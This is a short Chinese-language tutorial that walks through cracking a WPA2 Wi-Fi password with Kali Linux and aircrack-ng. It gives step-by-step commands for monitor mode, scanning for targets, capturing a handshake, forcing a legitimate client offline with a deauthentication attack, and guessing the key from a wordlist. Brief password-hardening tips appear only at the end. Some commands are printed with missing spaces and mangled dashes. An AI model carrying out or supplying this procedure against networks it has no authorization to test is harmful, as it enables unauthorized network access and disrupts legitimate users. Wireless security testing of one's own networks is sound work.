无线路由器WPA2加密破解方法1、启动KALI系统,并将无线网卡接入到KALI虚拟机中。
判断wlan无线网卡是否存在,此时无线网卡名称为wlan0 命令:ifconfig-a
2、为攻击做准备,停止部分服务
命令:airmon-ngcheckkill
3、将无线网卡转为监控模式
此时无线网卡名称从wlan0切换为wlan0mon
命令:airmon-ng start wlan0
4、扫描附近无线网络,寻找需要攻击的目标
确认要攻击目标的bssid和ch
命令:airodump-ng wlan0mon
5、开始抓握手包
命令:airodump-ng -c 1–bssid C8:3A:35:18:FB:88 -w pojie wlan0mon 参数-c要破解AP所在频道
--bssid要破解AP的MAC地址
-w抓取包保存的文件名
注意:最后一行信息的BSSID是AP的MAC地址,STATION是合法已经登录的客户端的MAC地址,下一步要将攻击该客户端,使其重新登录
6、保持当前终端窗口继续进行,打开一个新的终端,对合法的客户端进行攻击,使其下线
后重新登录,从而抓握手包。
命令:aireplay-ng –deauth1 -a C8:3A:35:18:FB:88 -c 01:AF:72:44:B1:AB wlan0mon
命令操作成功后,抓包窗口右上角会提示获取了握手数据包
7、利用抓取的数据猜解密码
命令:aircrack-ng-w/dict/wordlistpojie-01.cap
参数:/dict/wordlist密码字典,真实环境下可以用数亿条数据,测试时用我们可以自建密码字典
Pojie-01.cap是抓取的数据包,每次重新抓取后面的数值自增一个,变为02 03….
附录:制作密码字典
#mkdir/dict
#echo 12345678 >> /dict/wordlist
#echo 123456789 >> /dict/wordlist
#echo 1234567890 >> /dict/wordlist
附录:防止WPA2密码被破解的方法
1、wifi密码设得足够复杂,最少要设得10位以上,字母与数字混合。
2、关闭ssid广播功能,避免被扫描到
3、开启MAC地址白名单,将允许访问的客户端的地址加入到无线路由器的白名单中。